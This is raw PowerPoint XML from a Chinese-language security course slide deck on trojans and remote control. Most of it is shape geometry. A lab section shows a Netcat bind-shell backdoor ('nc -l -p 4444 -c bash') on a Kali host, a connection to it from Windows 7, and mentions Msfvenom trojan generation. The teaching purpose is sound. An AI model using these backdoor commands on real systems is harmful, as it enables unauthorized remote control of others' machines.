                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="3238500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100012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0" y="5143500"/>
            <a:ext cx="2133600" cy="1333500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2133600" h="1333500">
                <a:moveTo>
                  <a:pt x="1466850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1466850" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1331825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="1326878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="1318771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="1307617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="1293528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="1276617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="1256998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="1234782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="1210083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="1183014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="1153688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="1122217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="1088713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="1053291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="1016063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="977141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="936638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="894668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="851343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="806776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="761079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="714366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="666750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131926" y="619140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126980" y="572434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118874" y="526742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2107721" y="482179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093635" y="438856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2076727" y="396888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2057110" y="356386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034897" y="317465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010201" y="280236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1983135" y="244812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953811" y="211307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1922341" y="179834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888840" y="150505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1853419" y="123433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816191" y="98732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777269" y="76514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1736765" y="56892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1694793" y="39978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651466" y="25887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1606894" y="14731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1561193" y="6622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514474" y="1674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146685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0" y="6262682"/>
            <a:ext cx="1633855" cy="595630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1633855" h="595629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1033462" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1080357" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126266" y="7137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1171055" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214591" y="27823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256741" y="42915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297370" y="60995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1336345" y="81930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373533" y="105587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1408801" y="131832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442014" y="160531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473040" y="191551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1501744" y="224760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1527994" y="260023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1551655" y="297207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572595" y="336178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1590679" y="376804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1605775" y="418951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617748" y="462485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626466" y="507274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631795" y="553183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1633417" y="59531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0" y="6072187"/>
            <a:ext cx="1891030" cy="786130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1891030" h="786129">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1100137" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1148304" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195707" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242264" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287891" y="22423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332508" y="34691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376029" y="49460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1418374" y="66645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1459459" y="86164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1499202" y="107936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537519" y="131876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1574329" y="157902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1609548" y="185932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643095" y="215883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1674886" y="247672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704838" y="281216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1732869" y="316433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758896" y="353241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1782837" y="391556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1804609" y="431295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824129" y="472376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841315" y="514717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856083" y="558235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868352" y="602846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1878038" y="648469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885059" y="695020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1889333" y="742417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1890633" y="78581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0" y="5881687"/>
            <a:ext cx="2138680" cy="976630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2138680" h="976629">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1157287" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1204822" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1251774" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1298090" y="10027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343720" y="17690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1388612" y="27426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432715" y="39186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1475977" y="52917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518347" y="68568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559773" y="86087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600204" y="105424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1639590" y="126527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677877" y="149344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715015" y="173825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750953" y="199917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1785638" y="227569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819021" y="256731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851048" y="287350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1881670" y="319375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1910834" y="352755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1938488" y="387438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964583" y="423373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989065" y="460508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2011885" y="498793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032990" y="538176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052329" y="578605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2069850" y="620029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085503" y="662397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099235" y="705657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2110996" y="749757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2120733" y="794647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128397" y="840276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133934" y="886590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137294" y="933541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2138312" y="97631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TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276599" y="2438717"/>
            <a:ext cx="864869" cy="2033905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="50768" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="8406000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6600" b="1" spc="9">
              <a:solidFill>
                <a:srgbClr val="3C7CB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1" name="AutoShape 81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object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548890" y="748665"/>
            <a:ext cx="1800860" cy="5060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23060" algn="l"/>
                <a:tab pos="3234055" algn="l"/>
                <a:tab pos="4845050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" spc="10" dirty="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项目目标</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" spc="10" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D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" name="object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2548890" y="1282065"/>
            <a:ext cx="9158605" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" sx="1000" sy="1000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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23060" algn="l"/>
                <a:tab pos="3234055" algn="l"/>
                <a:tab pos="4845050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="6600" b="1" spc="10" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000">
                      <a:alpha val="6000"/>
                    </a:sysClr>
                  </a:solidFill>
                </a:ln>
                <a:noFill/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Learning objectives</a:t>
            </a:r>
            <a:endParaRPr sz="6600" b="1" spc="10" dirty="0">
              <a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000">
                    <a:alpha val="6000"/>
                  </a:sysClr>
                </a:solidFill>
              </a:ln>
              <a:noFill/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" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625090" y="1263650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  <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F58830"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="85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2285967" y="2196201"/>
            <a:ext cx="9167774" cy="394849"/>
            <a:chOff x="3926561" y="2953576"/>
            <a:chExt cx="7759700" cy="394849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4118976" y="2968181"/>
              <a:ext cx="288568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了解木马的分类和工作原理。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87" name="ïSľíḍé"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7115912" y="2953576"/>
              <a:ext cx="4435208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②　熟悉netcat、Msfvenom的使用步骤。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3926561" y="3348425"/>
              <a:ext cx="7759700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="63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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396504" y="1587028"/>
            <a:ext cx="1534885" cy="45845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知识目标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396676" y="2686251"/>
            <a:ext cx="1534885" cy="45845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能力目标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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93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2286015" y="3276691"/>
            <a:ext cx="9167774" cy="966349"/>
            <a:chOff x="3891089" y="2705926"/>
            <a:chExt cx="7759700" cy="966349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4083503" y="2705926"/>
              <a:ext cx="61782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能熟悉使用netcat、Msfvenom进行远程控制。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95" name="i$ḻîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4083503" y="3182176"/>
              <a:ext cx="413637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60000">
                        <a:schemeClr val="accent4"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>能够掌握防范木马渗透和远程控制攻击的方法。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="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60000">
                      <a:schemeClr val="accent4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3891089" y="3672275"/>
              <a:ext cx="7759700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="63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2513297" y="4800336"/>
            <a:ext cx="7540625" cy="809625"/>
            <a:chOff x="4065766" y="2953576"/>
            <a:chExt cx="6382465" cy="809625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4065766" y="2953576"/>
              <a:ext cx="544511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增强网络安全意识，培养在网络环境中自我保护和防范风险的意识。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99" name="ïSľíḍé"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4065766" y="3426016"/>
              <a:ext cx="638246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养团队协作能力，学会与他人有效沟通和协作，共同应对网络安全挑战。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402854" y="4229263"/>
            <a:ext cx="15348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素质目标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为了获取目标主机Linux系统的命令执行权限，可以使用Netcat在Linux系统中建立后门，建立与攻击机的连接，来实现执行目标主机命令的功能。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后门服务端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：Kali linux ,ip地址为10.10.10.127；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后门客户端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：Windows7系统，ip地址为10.10.10.128。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：实现在Windows7中远程控制目标Linux系统。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1.实验环境和目标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利用Netcat在Linux系统中进行监听，执行以下命令：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[root@kali]#nc -l -p 4444 -c bash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命令中-c bash表示连接上Netcat的监听服务的客户端将可以使用Linux操作系统命令行，并可以执行相对应的命令。Kali linux正在监听4444端口，如图8-8所示。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2.在Linux系统中建立后门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8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect b="64050"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3733800"/>
            <a:ext cx="6066790" cy="1803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267200" y="5638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图8-8 nc服务端正在监听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在Windows7中打开终端，并执行以下命令：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C:\Users\ABC\Desktop&gt;nc -vn 10.10.10.127 4444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命令执行后，成功连接上Linux系统后门服务端，如图8-9所示。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3.客户端连接后门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3733800" y="3200400"/>
            <a:ext cx="4852670" cy="32150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419600" y="64630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图8-9 nc客户端已连接上Linux系统后门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输入ls命令，可以查看Linux系统的当前目录，如图8-10所示。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3.客户端连接后门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2971800" y="2287905"/>
            <a:ext cx="6055360" cy="324993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038600" y="5715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图8-10 查看Linux系统当前目录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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/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Linux建立后门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0600" y="1676400"/>
            <a:ext cx="106140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输入pwd命令，可以查看Linux系统的当前目录路径，如图8-11所示。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0" y="12192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3.客户端连接后门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33800" y="5638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图8-11 查看Linux系统当前执行路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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2743200" y="2287905"/>
            <a:ext cx="5579745" cy="32181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14400" y="6019800"/>
            <a:ext cx="929449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至此，通过以上操作，Linux端成功建立木马后门，可以远程控制Linux系统。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PART06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>
            <a:off x="742370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870713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7" name="Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046279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AutoShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742370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870713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0" name="Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046279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AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058213" y="1671584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6186557" y="1799928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3" name="Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362122" y="2279404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AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6058213" y="3622548"/>
            <a:ext cx="607819" cy="607819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6186557" y="3750892"/>
            <a:ext cx="351132" cy="35113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6" name="Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362122" y="4230367"/>
            <a:ext cx="0" cy="831102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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500099" y="1567068"/>
            <a:ext cx="4309467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木马及远程控制技术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500099" y="2097646"/>
            <a:ext cx="3719751" cy="146068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项目深入探讨了木马及远程控制技术，包括木马的分类、工作原理以及防范措施，增强网络安全意识。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500099" y="3518032"/>
            <a:ext cx="4554426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Netcat工具功能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500099" y="4048610"/>
            <a:ext cx="3719751" cy="146068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利用Netcat工具在Windows和Linux系统上建立后门，展示了其在信息通信、文件传输和远程控制方面的强大功能。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894162" y="3518032"/>
            <a:ext cx="4527209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项目收获与意义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894162" y="4048610"/>
            <a:ext cx="3719751" cy="146068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项目不仅增强了参与者的网络安全意识，还提升了团队协作和实际操作能力，为应对网络安全挑战打下了坚实基础。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967612" y="1567068"/>
            <a:ext cx="4454628" cy="662297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Msfvenom工具应用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967612" y="2097646"/>
            <a:ext cx="3719751" cy="1460682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通过Msfvenom工具生成木马后门，实现了对目标系统的远程控制，提升了团队协作和实际操作能力。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400175" cy="2562225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1400175" h="2562225">
                <a:moveTo>
                  <a:pt x="1400174" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2478790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75181" y="2508277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119281" y="2522275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164238" y="2534263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210000" y="2544190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256515" y="2552001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303730" y="2557646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351592" y="2561071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400049" y="2562225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448506" y="2561071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496367" y="2557646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543581" y="2552001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590095" y="2544190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635857" y="2534263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680813" y="2522275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724913" y="2508277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768103" y="2492321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810332" y="2474460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="851546" y="2454747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891693" y="2433233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930721" y="2409972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968578" y="2385016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005211" y="2358416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040568" y="2330226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1074596" y="2300497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107243" y="2269283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1138456" y="2236636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1168184" y="2202607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196373" y="2167250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1222972" y="2130617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247928" y="2092760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1271189" y="2053732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292701" y="2013585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1312414" y="1972371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1330274" y="1930143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346229" y="1886953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1360227" y="1842854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372215" y="1797898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1382140" y="1752138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389952" y="1705626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1395596" y="1658413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1399021" y="1610554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400174" y="1562100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400174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881630" cy="700405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2881630" h="700405">
                <a:moveTo>
                  <a:pt x="2872829" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2874241" y="7255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879569" y="53172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2881375" y="100075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879569" y="146962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2874241" y="192863"/>
                </a:lnTo>
